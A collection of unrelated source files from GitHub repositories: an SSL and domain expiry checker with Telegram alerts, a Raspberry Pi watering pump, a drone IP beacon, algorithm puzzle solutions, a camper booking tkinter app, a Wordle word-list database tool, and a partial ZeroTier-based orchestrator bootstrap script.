from config import DOMAINS, DAYS_LIMIT_CERT, DAYS_LIMIT_DOMAIN, APITOKEN, CHATID
date_fmt = r'%b %d %H:%M:%S %Y %Z'
MESSAGE_CERTIFICATE_EXPIRED = "⚠️ SSL expired on {}"
MESSAGE_HOSTNAME_MISMATCH = "⚠️ SSL hostname mismatch on {}"
MESSAGE_EXCEPTION = "⚠️ SSL exception on {}: {}"
def send_message(text):
"""
Send message to the Telegram via API
:param text: message
"""
url = 'https://api.telegram.org/bot{}/sendMessage'.format(APITOKEN)
data = {
'text': text,
'chat_id': CHATID,
'disable_web_page_preview': True
}
requests.post(url, json=data)
def ssl_expiry_datetime(hostname):
"""
Get SSL expiration date
Source link: https://serverlesscode.com/post/ssl-expiration-alerts-with-lambda/
:param hostname: hostname
:return datetime object or None
"""
context = ssl.create_default_context()
conn = context.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=hostname,
)
# 3 second timeout because Lambda has runtime limitations
conn.settimeout(3.0)
try:
conn.connect((hostname, 443))
ssl_info = conn.getpeercert()
except ssl.SSLError as e:
if e.verify_code == 10:
send_message(MESSAGE_CERTIFICATE_EXPIRED.format(hostname))
elif e.verify_code == 62:
send_message(MESSAGE_HOSTNAME_MISMATCH.format(hostname))
else:
send_message(MESSAGE_EXCEPTION.format(hostname, e.verify_message))
return None
# Parse the string from the certificate into a Python datetime object
return datetime.datetime.strptime(ssl_info['notAfter'], date_fmt)
def check_ssl_time_left(domain):
"""
Count days left and generate a warning message
:param domain: domain
:return:
"""
cert_expire_at = ssl_expiry_datetime(domain)
if cert_expire_at is not None:
time_left = cert_expire_at - datetime.datetime.now()
message = 'SSL cert for {} has {}'.format(domain, days_left_to_format_string(time_left))
if time_left.days <= DAYS_LIMIT_CERT:
message = '⚠️ {}'.format(message)
send_message(message)
print(message)
def days_left_to_format_string(timedelta):
"""
Calculate days left from timedelta and return string message
:param timedelta: timedelta object
:return: string message with the days left
"""
return '{} day{} left'.format(timedelta.days, ('s', '')[timedelta.days == 1])
if not APITOKEN:
print('No APITOKEN was found in config file.')
exit()
for domain in DOMAINS:
try:
check_ssl_time_left(domain)
w = whois.whois(domain)
expdays = 'Expiration date for {} has {}'.format(domain, days_left_to_format_string(w.expiration_date-datetime.datetime.now()))
print(expdays)
if (w.expiration_date-datetime.datetime.now()).days <= DAYS_LIMIT_DOMAIN:
send_message(expdays)
except Exception as e:
print("Unexpected error:", e)
``` |
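The script imports its settings from a `config` module that is not part of this snippet. A minimal sketch of what such a config.py could look like (all values are illustrative placeholders, not the project's real configuration):
```python
# config.py (hypothetical example values)
DOMAINS = ['example.com', 'example.org']  # domains whose SSL and registration are checked
DAYS_LIMIT_CERT = 14      # warn when the SSL certificate expires within this many days
DAYS_LIMIT_DOMAIN = 30    # warn when the domain registration expires within this many days
APITOKEN = '<telegram-bot-token>'   # token of the Telegram bot that sends the warnings
CHATID = '<telegram-chat-id>'       # chat that receives the warnings
```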
{
"source": "5j54d93/Google-Hardware-Product-Sprint",
"score": 3
} |
#### File: Google-Hardware-Product-Sprint/bump/Bump.py
```python
from temperature_humidity.SHT31D import SHT31D
from datetime import datetime
import RPi.GPIO as GPIO
import time
class Bump:
def __init__(self):
GPIO.setmode(GPIO.BCM)
self.RELAY = 24
GPIO.setup(self.RELAY, GPIO.OUT)
self.SHT31D = SHT31D()
self.last_watering_month = 0
self.last_watering_day = 0
self.last_watering_hour = 0
self.last_watering_min = 0
def last_watering_time(self):
if self.last_watering_hour == 0 and self.last_watering_min == 0 : return "Haven't watered yet."
return str(self.last_watering_month) + '/' + str(self.last_watering_day) + ' ' + str(self.last_watering_hour).zfill(2) + ':' + str(self.last_watering_min).zfill(2)
def upon_last_watering_time(self):
if self.last_watering_hour == 0 and self.last_watering_min == 0 : return "Haven't watered yet."
return str(datetime.now().hour * 60 + datetime.now().minute - self.last_watering_hour * 60 - self.last_watering_min)
def update_last_watering_time(self):
self.last_watering_month = datetime.now().month
self.last_watering_day = datetime.now().day
self.last_watering_hour = datetime.now().hour
self.last_watering_min = datetime.now().minute
def watering(self):
GPIO.output(self.RELAY, GPIO.LOW)
time.sleep(3)
GPIO.output(self.RELAY, GPIO.HIGH)
self.update_last_watering_time()
def auto_watering(self):
if self.SHT31D.dry_or_wet_plant() == "It's dry for plants!" :
if self.upon_last_watering_time() == "Haven't watered yet." or int(self.upon_last_watering_time()) >= 720 :
self.watering()
self.update_last_watering_time()
``` |
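A hedged usage sketch for the watering class above, assuming `Bump` is importable from this module; it only runs on a Raspberry Pi with the relay wired to BCM pin 24 and an SHT31-D sensor attached, and the loop interval is an arbitrary choice:
```python
import time
import RPi.GPIO as GPIO

pump = Bump()
try:
    while True:
        pump.auto_watering()   # waters only when it is dry and at least 720 minutes have passed
        print("last watered:", pump.last_watering_time())
        time.sleep(60)
finally:
    GPIO.cleanup()             # release the GPIO pins on exit
```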
{
"source": "5jjCopter/navio-stacion",
"score": 3
} |
#### File: navio-stacion/drone/beacon.py
```python
import time
import socket
from urllib import request
class Beacon():
sock = None
def __init__(self, host, port, spec_ip=None):
self.given_ip = spec_ip
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.sock.connect((host, port))
def send(self, message):
self.sock.sendall(bytes(message, 'utf-8'))
def read(self):
return str(self.sock.recv(1024), 'utf-8')
def ping(self):
message = request.urlopen('http://ipinfo.io/ip').read().decode('utf-8')[:-1]
if self.given_ip:
return self.send(self.given_ip)
else:
return self.send(message)
def close(self):
self.sock.close()
self.sock = None
if __name__ == '__main__':
GCS_IP = '172.16.58.3'
GCS_PORT = 9999
while 1:
time.sleep(10)
beacon_station = Beacon(GCS_IP, GCS_PORT, '192.168.100.147')
beacon_station.ping()
beacon_station.close()
``` |
{
"source": "5joon2/algorithm_programmers",
"score": 3
} |
#### File: algorithm_programmers/lv3/express_N.py
```python
def solution(N, number):
dp = []
answer = -1
for i in range(0, 8):
tmp = []
print('dp: ', dp)
for j in range(0, i):
for k in dp[j]:
print('i, j: ', i, j)
for l in dp[i-j-1]:
mul = k * l
if l > 0:
div = k // l if k // l > 0 else None
add = k + l
sub = k - l if k - l >= 0 else None
if div is not None:
tmp.append(div)
if sub is not None:
tmp.append(sub)
tmp.append(add)
tmp.append(mul)
tmp.append(int(str(N) * (i+1)))
if number in tmp:
answer = i+1
break
dp.append(list(set(tmp)))
return answer
# Test 1 〉 Passed (0.78ms, 10.5MB)
# Test 2 〉 Passed (0.03ms, 10.4MB)
# Test 3 〉 Passed (0.04ms, 10.4MB)
# Test 4 〉 Passed (13.87ms, 12.4MB)
# Test 5 〉 Passed (8.11ms, 11.6MB)
# Test 6 〉 Passed (0.21ms, 10.4MB)
# Test 7 〉 Passed (0.22ms, 10.4MB)
# Test 8 〉 Passed (11.26ms, 11.9MB)
# Test 9 〉 Passed (0.02ms, 10.4MB)
```
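A quick check with the example from the problem statement (12 can be written with four 5s as (55 + 5) / 5, and 11 with three 2s as 22 / 2); note that the function still contains its debug `print` calls:
```python
print(solution(5, 12))  # expected: 4
print(solution(2, 11))  # expected: 3
```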
#### File: algorithm_programmers/lv3/jewel_shopping.py
```python
from collections import defaultdict
def solution(gems):
gems_dict = defaultdict(int)
gems_num = len(set(gems))
gems_candidate_num = len(gems)
left = 0
right = 0
last_min = 99999999999
answer = []
while right < gems_candidate_num:
gems_dict[gems[right]] += 1
right += 1
if len(gems_dict) == gems_num:
while left < right:
if gems_dict[gems[left]] <= 1:
break
gems_dict[gems[left]] -= 1
left += 1
if last_min > right - left:
last_min = right - left
answer = [left+1, right]
return answer
# ["AA", "AB", "AC", "AA", "AC"]
# Test 1 〉 Passed (0.02ms, 10.2MB)
# Test 2 〉 Passed (0.09ms, 10.4MB)
# Test 3 〉 Passed (0.16ms, 10.2MB)
# Test 4 〉 Passed (0.20ms, 10.3MB)
# Test 5 〉 Passed (0.25ms, 10.2MB)
# Test 6 〉 Passed (0.01ms, 10.2MB)
# Test 7 〉 Passed (0.01ms, 10.2MB)
# Test 8 〉 Passed (0.28ms, 10.3MB)
# Test 9 〉 Passed (0.64ms, 10.3MB)
# Test 10 〉 Passed (0.32ms, 10.3MB)
# Test 11 〉 Passed (0.47ms, 10.4MB)
# Test 12 〉 Passed (0.67ms, 10.3MB)
# Test 13 〉 Passed (1.03ms, 10.4MB)
# Test 14 〉 Passed (0.84ms, 10.4MB)
# Test 15 〉 Passed (2.05ms, 10.5MB)
# Efficiency tests
# Test 1 〉 Passed (2.94ms, 10.6MB)
# Test 2 〉 Passed (3.31ms, 10.6MB)
# Test 3 〉 Passed (7.37ms, 11.2MB)
# Test 4 〉 Passed (6.91ms, 12MB)
# Test 5 〉 Passed (13.54ms, 12MB)
# Test 6 〉 Passed (15.81ms, 12.3MB)
# Test 7 〉 Passed (19.37ms, 12.7MB)
# Test 8 〉 Passed (19.43ms, 12.8MB)
# Test 9 〉 Passed (21.53ms, 13.5MB)
# Test 10 〉 Passed (29.01ms, 14.1MB)
# Test 11 〉 Passed (32.42ms, 14.8MB)
# Test 12 〉 Passed (22.82ms, 15.5MB)
# Test 13 〉 Passed (31.38ms, 16.4MB)
# Test 14 〉 Passed (48.72ms, 17.1MB)
# Test 15 〉 Passed (45.13ms, 17.8MB)
```
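A quick check using the small case already noted in the comment above: the shortest range that covers all three gem kinds is positions 1 through 3.
```python
print(solution(["AA", "AB", "AC", "AA", "AC"]))  # expected: [1, 3]
print(solution(["XYZ", "XYZ", "XYZ"]))           # expected: [1, 1], a single kind needs one slot
```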
#### File: algorithm_programmers/lv3/table_edit.py
```python
class Node:
def __init__(self, item=None, state=True):
self.data = item
self.left = None
self.right = None
class DLL:
def __init__(self):
self.head = Node()
self.tail = Node()
self.head.right = self.tail
self.head.left = self.head
self.tail.right = self.tail
self.tail.left = self.head
self.pointer = self.head # point head at first
self.stack = []
def insert(self, node):
self.pointer.right = node
node.left = self.pointer
node.right = self.tail
self.pointer = node
def move(self, command, n):
if command == 'U':
while n:
if self.pointer.left != self.head:
n -= 1
self.pointer = self.pointer.left
elif self.pointer.left == self.head:
break
elif command == 'D':
while n:
if self.pointer.right != self.tail:
n -= 1
self.pointer = self.pointer.right
elif self.pointer.right == self.tail:
break
def remove(self):
self.pointer.state = False
self.pointer.left.right = self.pointer.right
self.pointer.right.left = self.pointer.left
self.stack.append(self.pointer)
if self.pointer.right == self.tail:
self.pointer = self.pointer.left
else:
self.pointer = self.pointer.right
def recover(self):
recover_node = self.stack.pop(-1)
recover_node.state = True
recover_node.left.right = recover_node
recover_node.right.left = recover_node
def set_pointer(self, n):
cur = self.head
while n+1:
self.pointer = cur.right
n -= 1
cur = cur.right
def solution(n, k, cmd):
answer = ['X']*n
dll = DLL()
for i in range(n):
node = Node(item=str(i), state=True)
dll.insert(node)
dll.set_pointer(k)
for command in cmd:
commands = command.split()
if len(commands) > 1:
if commands[0] == 'U' or commands[0] == 'D':
dll.move(commands[0], int(commands[1]))
elif commands[0] == 'C':
dll.remove()
elif commands[0] == 'Z':
dll.recover()
cur = dll.head
while cur.right != dll.tail:
answer[int(cur.right.data)] = 'O'
cur = cur.right
return ''.join(answer)
# Efficiency tests
# Test 1 〉 Passed (2285.82ms, 238MB)
# Test 2 〉 Passed (2395.20ms, 238MB)
# Test 3 〉 Passed (2337.52ms, 238MB)
# Test 4 〉 Passed (2036.60ms, 244MB)
# Test 5 〉 Passed (2300.08ms, 244MB)
# Test 6 〉 Passed (1965.71ms, 244MB)
# Test 7 〉 Passed (481.87ms, 61.7MB)
# Test 8 〉 Passed (575.42ms, 75.7MB)
# Test 9 〉 Passed (2289.19ms, 245MB)
# Test 10 〉 Passed (2157.53ms, 245MB)
``` |
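A quick check with the example from the problem statement: starting from row 2 of an 8-row table, the commands delete rows 4, 1 and 7, then the two "Z" commands restore rows 7 and 1, so only row 4 stays deleted.
```python
print(solution(8, 2, ["D 2", "C", "U 3", "C", "D 4", "C", "U 2", "Z", "Z"]))
# expected: "OOOOXOOO"
```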
{
"source": "5kamis52/com714-SolentCampers",
"score": 3
} |
#### File: 5kamis52/com714-SolentCampers/classCamper.py
```python
from enums import CamperType
import csv
import os
class Camper:
def __init__(self, id, size):
self.id = id
for e in CamperType:
if e.name == size:
size = e.value
break
self.size = size
def writeCamperData(self):
header = ['id', 'type']
if os.path.isfile('data/campers.csv'):
f = open('data/campers.csv', 'a', newline='', encoding='utf-8')
writer = csv.writer(f)
writer.writerow([self.id, self.size])
f.close()
else:
f = open('data/campers.csv', 'w', newline='', encoding='utf-8')
writer = csv.writer(f)
writer.writerow(header)
writer.writerow([self.id, self.size])
f.close()
```
#### File: 5kamis52/com714-SolentCampers/tkAdmin.py
```python
import tkinter as tk
import tkinter.messagebox
from enums import CamperType, CampRegion
import random
import classCamp, classCamper
class AdminWindow:
def __init__(self, root):
self.window = tk.Toplevel(root)
self.window.grab_set()
self.displayHeader()
self.displayCampSiteForm()
self.displayCamperVanForm()
self.window.title('Administrator - Solent Campers')
self.window.geometry("400x350+450+100")
def displayHeader(self):
headFrame = tk.Frame(self.window, width=400, height=100)
headFrame.pack(side=tk.TOP, pady=(10,20))
label1 = tk.Label(headFrame, text="Welcome To Solent Camper!")
label1.pack(side=tk.TOP)
label2 = tk.Label(headFrame, text="As Administrator, You Can Add Camps and Vans..")
label2.pack(side=tk.TOP)
def displayCampSiteForm(self):
campFrame = tk.Frame(self.window, width=400, height=120, bg='blue')
campFrame.pack(side=tk.TOP, pady=(10,20))
campFrame.pack_propagate(0)
topFrame = tk.Frame(campFrame, width=400, height=30)
topFrame.pack(side=tk.TOP)
topFrame.pack_propagate(0)
label1 = tk.Label(topFrame, text="Add a Camp Site.")
label1.pack(side=tk.LEFT, padx=(10,0))
middleFrame = tk.Frame(campFrame, width=400, height=90)
middleFrame.pack(side=tk.TOP)
middleFrame.pack_propagate(0)
self.campName = tk.StringVar()
self.campName.set("")
self.campNameField = tk.Entry(middleFrame, textvariable=self.campName)
self.campNameField.pack(side=tk.TOP, pady=(00,5))
self.region = tk.StringVar()
self.region.set(CampRegion.RegionA.name)
self.campRegionField = tk.OptionMenu(middleFrame, self.region, *[e.name for e in CampRegion])
self.campRegionField.pack(side=tk.TOP, pady=(0,5))
button = tk.Button(middleFrame, text="Add New Site", height=1, width=15, command=self.saveCamp)
button.pack(side=tk.TOP)
def displayCamperVanForm(self):
camperFrame = tk.Frame(self.window, width=400, height=100, bg='green')
camperFrame.pack(side=tk.TOP, pady=(10,20))
topFrame = tk.Frame(camperFrame, width=400, height=30)
topFrame.pack(side=tk.TOP)
topFrame.pack_propagate(0)
label1 = tk.Label(topFrame, text="Add a Camper Van.")
label1.pack(side=tk.LEFT, padx=(10,0))
middleFrame = tk.Frame(camperFrame, width=400, height=70)
middleFrame.pack(side=tk.TOP)
middleFrame.pack_propagate(0)
self.vanType = tk.StringVar()
self.vanType.set(CamperType.Small.name)
self.camperTypeField = tk.OptionMenu(middleFrame, self.vanType, *[e.name for e in CamperType])
self.camperTypeField.pack(side=tk.TOP, pady=(0,10))
button = tk.Button(middleFrame, text="Add New Van", height=1, width=15, command=self.saveVan)
button.pack(side=tk.TOP)
def saveVan(self):
camperID = random.randint(100,999)
newCamper = classCamper.Camper(camperID, self.vanType.get())
newCamper.writeCamperData()
tkinter.messagebox.showinfo(master=self.window, title="Van Added", message="Camper Van added with ID " + str(camperID) )
def saveCamp(self):
if self.campName.get() == "":
tkinter.messagebox.showerror(master=self.window, title="Missing Value", message="Camp Name Can't be Empty")
return
campID = random.randint(100,999)
newCamp = classCamp.Camp(campID, self.campName.get(), self.region.get())
newCamp.writeCampData()
tkinter.messagebox.showinfo(master=self.window, title="Camp Site Added", message="Camp "+self.campName.get()+" added to " + self.region.get() )
``` |
{
"source": "5kdn/WordleDict",
"score": 3
} |
#### File: app/app/DBController.py
```python
import os
import re
import sqlite3
import urllib.request
import urllib.parse
import urllib.error
from typing import List, Dict, Tuple, Any
from bs4 import BeautifulSoup
class DBController(object):
"""Database controller for the Wordle word list."""
__base_url = 'https://www.nytimes.com/games/wordle/'
__headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0"}
def __init__(self, dbpath: str = './dict.sqlite') -> None:
"""Constructor.
Connects to the database.
If the database does not exist, it is created and the word list is fetched from Wordle.
Args:
dbpath (str, optional): path to database. Defaults to './dict.sqlite'.
"""
_is_create_DB = False
self.__dbpath = dbpath
if not os.path.isfile(dbpath):
_is_create_DB = True
self._create_db()
if _is_create_DB:
self.update_db()
def _create_db(self) -> None:
"""Create DB and table.
"""
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
queue = """\
CREATE TABLE words(
id INTEGER PRIMARY KEY AUTOINCREMENT,
word TEXT UNIQUE NOT NULL
);"""
cur.execute(queue)
queue = """\
CREATE TABLE jsversion(
id INTEGER PRIMARY KEY AUTOINCREMENT,
version TEXT NOT NULL,
date TIMESTAMP DEFAULT(STRFTIME('%Y-%m-%d', DATETIME('now','localtime')))
)"""
cur.execute(queue)
conn.commit()
cur.close()
def search_words(
self,
in_: List[str] = [],
in_not_position: List[Dict[str, List[int]]] = [],
notin: List[str] = [],
fixed: str = '') -> List[Any]:
"""Search the DB for words that match the given conditions.
Args:
in_ (List[str], optional): letters known to be somewhere in the word (yellow). Defaults to [].
in_not_position (List[Dict[str, List[int]]], optional): positions where those known letters cannot appear. Defaults to [].
notin (List[str], optional): letters known not to be in the word (grey). Defaults to [].
fixed (str, optional): letters fixed at their positions, given as a LIKE pattern (green). Defaults to ''.
Raises:
Exception: invalid arguments.
Returns:
List[Any]: words matching the conditions.
"""
# validate the inputs
if type(in_) == list and len(in_) > 5:
raise Exception
if type(in_not_position) == list and len(in_not_position) > 5:
raise Exception
if type(notin) == list and len(notin) > 26:
raise Exception
if type(fixed) == str and len(fixed) > 5:
raise Exception
subquery: List[str] = []
arg: List[str] = []
# not in
if len(notin) > 0:
subquery.append(' word NOT GLOB ?')
arg.append(f'*[{"".join(notin)}]*')
# in
for i in in_:
if type(i) != str or len(i) != 1:
raise Exception
subquery.append(' word LIKE ?')
arg.append(f'%{i}%')
# fixed position
if len(fixed) > 0:
subquery.append(f' word LIKE ?')
arg.append(fixed)
# generate query
query: str = f'SELECT word FROM words'
if len(subquery) > 0:
query += " WHERE"
for i, q in enumerate(subquery):
prefix: str = ''
if i != 0:
prefix = ' AND'
query += prefix + q
query += ' ORDER BY word ASC'
ret: List[Any] = []
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
ret = [r for (r,) in cur.execute(query, tuple(arg)).fetchall()]
if ret == None:
ret = []
return ret
def _get_new_wordlist(self, js_url: str) -> Dict[str, Tuple[str]]:
"""Extract the word lists from the Wordle javascript file.
Args:
js_url (str): url of the js file (main.[hash].js)
Raises:
Exception: the word lists could not be found in the js source.
Returns:
Dict[str, Tuple[str]]:
'in': words that can be the answer
'not_in': words that cannot be the answer but are accepted as guesses
"""
r_in = re.compile(r'\[(\"(?:[a-z]{5})\",?){1000,5000}\]')
r_notin = re.compile(r'\[(\"(?:[a-z]{5})\",?){5001,20000}\]')
req = urllib.request.Request(js_url, headers=self.__headers)
with urllib.request.urlopen(req) as res:
body = res.read().decode('utf-8')
list_in = r_in.search(body)
list_notin = r_notin.search(body)
if list_in is None or list_notin is None:
raise Exception('word list not found in the js source')
in_ = tuple(sorted(list_in.group()[2:-2].split('","')))
not_in = tuple(sorted(list_notin.group()[2:-2].split('","')))
return {'in': in_, 'not_in': not_in}
def _get_js_name(self) -> str:
"""Get the javascript file name from the Wordle page.
Raises:
Exception:
Returns:
str: file name of Wordle's javascript.
"""
soup = None
req = urllib.request.Request(self.__base_url, headers=self.__headers)
with urllib.request.urlopen(req) as res:
soup = BeautifulSoup(res, 'html.parser')
js_elem = soup.select_one("body > script:nth-of-type(2)")
if js_elem is None:
raise Exception
ret = js_elem['src']
if type(ret) is not str:
raise Exception
return ret
def _is_same_version(self, hash: str) -> bool:
"""Compare the javascript hash against the recorded hash to decide whether the stored word list is current.
Args:
hash (str): hash of the js file (main.[hash].js)
Returns:
bool:
True: same version
False: different version
"""
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
queue = 'SELECT count(version) FROM jsversion'
cnt = cur.execute(queue).fetchone()
if cnt[0] == 0:
return False
queue = 'SELECT version FROM jsversion WHERE id = (SELECT max(id) FROM jsversion)'
saved_hash = cur.execute(queue).fetchone()[0]
if saved_hash != hash:
return False
return True
def update_db(self) -> None:
# get new wordlist
js_name: str = self._get_js_name()
if self._is_same_version(js_name):
return
js_url: str = urllib.parse.urljoin(self.__base_url, js_name)
wordlist = self._get_new_wordlist(js_url)
# add to DB
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
cur.execute('DELETE FROM words')
queue = 'INSERT INTO words (word) values (?)'
cur.executemany(queue, map(lambda x: (x,), wordlist["in"]))
queue = 'INSERT INTO jsversion(version) values(?)'
conn.execute(queue, (js_name,))
conn.commit()
def get_version(self) -> str:
"""Get the latest recorded jsversion from the DB.
Returns:
str: the latest jsversion hash
"""
res: str = ''
with sqlite3.connect(self.__dbpath) as conn:
cur = conn.cursor()
queue = 'SELECT version FROM jsversion WHERE id = (select max(id) from jsversion)'
res = cur.execute(queue).fetchone()[0]
return res.split('.')[1]
``` |
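A hedged usage sketch for the controller above (the first run needs network access, because the constructor scrapes the current word list from the Wordle page into dict.sqlite; the letters below are just an example query):
```python
db = DBController('./dict.sqlite')

# 'a' and 'r' are somewhere in the word (yellow), 'e', 't', 'o' are excluded (grey),
# and the last letter is fixed to 'y' (green, expressed as a SQL LIKE pattern).
candidates = db.search_words(in_=['a', 'r'], notin=['e', 't', 'o'], fixed='____y')
print(candidates[:10])

# refresh the stored list when the Wordle js bundle changes
db.update_db()
```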
{
"source": "5l1v3r1/0-orchestrator",
"score": 3
} |
#### File: 0-orchestrator/autosetup/autobootstrap.py
```python
import argparse
import subprocess
import requests
import sys
import time
import yaml
import pytoml as toml
from jose import jwt
from urllib.parse import urlparse
from zeroos.orchestrator.sal.Node import Node
from zerotier import client as ztclient
class ZerotierAuthorizer:
def __init__(self, token):
self.client = ztclient.Client()
self.client.set_auth_header("Bearer " + token)
def validate(self, networkid):
try:
x = self.client.network.getNetwork(networkid)
return True
except Exception:
return False
def memberMacAddress(self, memberid, networkid):
"""
This code is a python port of the code used in the web-ui interface.
Taken from the web-ui javascript code, it computes the client mac address
based on the member id and network id
"""
n = int(networkid[0:8] or "0", 16)
r = int(networkid[8:16] or "0", 16)
i = 254 & r | 2
if i == 82:
i = 50
o = i << 8 & 65280
while True:
o |= 255 & (int(memberid[0:2], 16) or 0)
o ^= r >> 8 & 255
if len("%04x" % o) == 4:
break
a = int(memberid[2:6], 16)
while True:
a ^= (r >> 16 & 255) << 8
a ^= r >> 24 & 255
if len("%04x" % a) == 4:
break
s = int(memberid[6:10], 16)
while True:
s ^= (255 & n) << 8
s ^= n >> 8 & 255
if len("%04x" % s) == 4:
break
def segment(source):
computed = "%04x" % source
return "%s:%s" % (computed[0:2], computed[2:4])
return "%s:%s:%s" % (segment(o), segment(a), segment(s))
def authorize_node(self, member):
member['config']['authorized'] = True
self.client.network.updateMember(member, member['nodeId'], member['networkId'])
def memberFromMac(self, networkid, hwaddr):
members = self.client.network.listMembers(networkid).json()
for member in members:
usermac = self.memberMacAddress(member['nodeId'], networkid)
if usermac == hwaddr:
return member
return None
def authorize(self, networkid, hwaddr):
netinfo = self.client.network.getNetwork(networkid).json()
netname = netinfo['config']['name']
member = self.memberFromMac(networkid, hwaddr)
if not member:
print("[-] member not found, you should waits for it before")
return None
self.authorize_node(member)
class OrchestratorJWT:
def __init__(self, token):
self.jwt = token
self.data = jwt.get_unverified_claims(token)
def organization(self):
for scope in self.data['scope']:
if scope.startswith('user:memberof:'):
return scope.split(':')[2]
return None
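# e.g. a scope entry "user:memberof:myorg" makes organization() return "myorg"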
def isValid(self):
try:
jwt._validate_exp(self.jwt)
return True
except Exception:
return False
class OrchestratorSSHTools:
def __init__(self):
pass
def localkeys(self):
"""
returns local ssh public keys available and loaded
"""
process = subprocess.run(["ssh-add", "-L"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# avoid empty agent
if process.returncode != 0:
return ""
return process.stdout
def loadkey(self, filename):
with open(filename, "r") as f:
sshkey = f.read()
return sshkey
def validkey(self, key):
return key.startswith("-----BEGIN RSA PRIVATE KEY-----")
def encryptedkey(self, key):
# this is not sufficient for newer key formats, but it is a good first check
return (",ENCRYPTED" in key)
class OrchestratorInstallerTools:
def __init__(self):
self.ssh = OrchestratorSSHTools()
def generatetoken(self, clientid, clientsecret, organization=None, validity=None):
params = {
'grant_type': 'client_credentials',
'client_id': clientid,
'client_secret': clientsecret,
'response_type': 'id_token',
'scope': 'offline_access'
}
if validity:
params['validity'] = validity
if organization:
params['scope'] = 'user:memberof:%s,offline_access' % organization
url = 'https://itsyou.online/v1/oauth/access_token'
resp = requests.post(url, params=params)
resp.raise_for_status()
return resp.content.decode('utf8')
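# Illustrative call (placeholder credentials): requests a client-credentials token
# from itsyou.online, scoped to an organization and valid for one hour:
#   tools = OrchestratorInstallerTools()
#   token = tools.generatetoken("<client-id>", "<client-secret>", "myorg", 3600)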
def ztstatus(self, cn, macaddr):
"""
Return a zerotier node object from a mac address
"""
ztinfo = cn.client.zerotier.list()
for zt in ztinfo:
if zt['mac'] == macaddr:
return zt
return None
def ztwait(self, cn, macaddr):
while True:
self.progressing()
# get and ensure mac address is there
status = self.ztstatus(cn, macaddr)
if not status:
return None
for addr in status['assignedAddresses']:
# checking for ipv4, rejecting ipv6
if "." in addr:
# network ready, address set
self.progressing(True)
return addr.split('/')[0]
time.sleep(1)
continue
def ztdiscover(self, authorizer, networkid, hwaddr):
while True:
self.progressing()
if authorizer.memberFromMac(networkid, hwaddr):
self.progressing(final=False, step=True)
return True
time.sleep(1)
def containerzt(self, cn, authorizer, nwid=None):
# for each zerotier network, wait for a valid address
ztinfo = cn.client.zerotier.list()
for ztnet in ztinfo:
# only process specific nwid if provided
if nwid and ztnet['nwid'] != nwid:
continue
print("[+] waiting zerotier access (id: %s, hardware: %s)" % (ztnet['nwid'], ztnet['mac']))
self.progress()
# waiting for the client to be discovered
self.ztdiscover(authorizer, ztnet['nwid'], ztnet['mac'])
# self-authorizing client
authorizer.authorize(ztnet['nwid'], ztnet['mac'])
# waiting for ip-address
return self.ztwait(cn, ztnet['mac'])
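# Illustrative flow: containerzt() waits until the container's zerotier member
# shows up on the network (ztdiscover), authorizes it through the api token,
# then waits for an ipv4 address to be assigned (ztwait) and returns that address.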
def progress(self):
self.xprint("[+] ")
def progressing(self, final=False, step=False):
progression = "." if not step else "+"
if final:
progression = " done\n"
self.xprint(progression)
def xprint(self, content):
sys.stdout.write(content)
sys.stdout.flush()
def hostof(self, upstream):
# attempt ssh/url style
url = urlparse(upstream)
if url.hostname is not None:
return {"host": url.hostname, "port": url.port}
# fallback to git style
# [email protected]:repository
# -> ['git', 'github.com:repository']
# -> ['github.com', 'repository']
hostname = upstream.split("@")[1].split(":")[0]
return {"host": hostname, "port": 22}
def waitsfor(self, cn, command):
self.progress()
while True:
self.progressing()
x = cn.client.bash(command).get()
if x.state == 'SUCCESS':
self.progressing(True)
return True
# keep retrying until the command succeeds
class OrchestratorInstaller:
def __init__(self):
self.tools = OrchestratorInstallerTools()
self.node = None
self.flist = "https://hub.gig.tech/maxux/0-orchestrator-full-alpha-8.flist"
self.ctname = None
self.core_version = "master"
self.templates = "/opt/code/github/zero-os/0-orchestrator/autosetup/templates"
def connector(self, remote, auth):
"""
remote: remote address of the node
auth: password (usually a jwt token) for the client
"""
print("[+] contacting zero-os server: %s" % remote)
while True:
try:
node = Node(remote, password=auth)
node.client.timeout = 180
break
except RuntimeError as e:
print("[-] cannot connect server (make sure the server is reachable), retrying")
time.sleep(1)
pass
self.node = node
return node
def prepare(self, ctname, ztnet, ztnetnodes, sshkey, ztauthnodes, ztauth):
"""
ctname: container name
ztnet: zerotier network id the orchestrator container should join
ztnetnodes: zerotier network id of the cluster nodes
sshkey: ssh private key to install in the container (None to generate a new one)
ztauthnodes: ZerotierAuthorizer for the nodes network
ztauth: optional ZerotierAuthorizer for the orchestrator network
"""
self.ctname = ctname
print("[+] starting orchestrator container")
network = [
{'type': 'default'},
{'type': 'zerotier', 'id': ztnet}
]
if ztnetnodes != ztnet:
network.append({'type': 'zerotier', 'id': ztnetnodes})
env = {
"PATH": "/opt/jumpscale9/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"PYTHONPATH": "/opt/jumpscale9/lib/:/opt/code/github/jumpscale/core9/:/opt/code/github/jumpscale/prefab9/:/opt/code/github/jumpscale/ays9:/opt/code/github/jumpscale/lib9:/opt/code/github/jumpscale/portal9",
"HOME": "/root",
"LC_ALL": "C.UTF-8",
"LC_LANG": "UTF-8"
}
hostvolume = '/var/cache/containers/orchestrator-%s' % ctname
if not self.node.client.filesystem.exists(hostvolume):
self.node.client.filesystem.mkdir(hostvolume)
cn = self.node.containers.create(
name=ctname,
flist=self.flist,
nics=network,
hostname='bootstrap',
mounts={hostvolume: '/optvar'},
env=env
)
print("[+] setting up and starting ssh server")
cn.client.bash('dpkg-reconfigure openssh-server').get()
cn.client.bash('/etc/init.d/ssh start').get()
print("[+] allowing local ssh key")
localkeys = self.tools.ssh.localkeys()
if localkeys != "":
fd = cn.client.filesystem.open("/root/.ssh/authorized_keys", "w")
cn.client.filesystem.write(fd, localkeys)
cn.client.filesystem.close(fd)
else:
print("[-] warning: no local ssh public key found, nothing added")
# make sure the environment is also set in bashrc for when ssh is used
print("[+] setting environment variables")
fd = cn.client.filesystem.open("/root/.bashrc", "a")
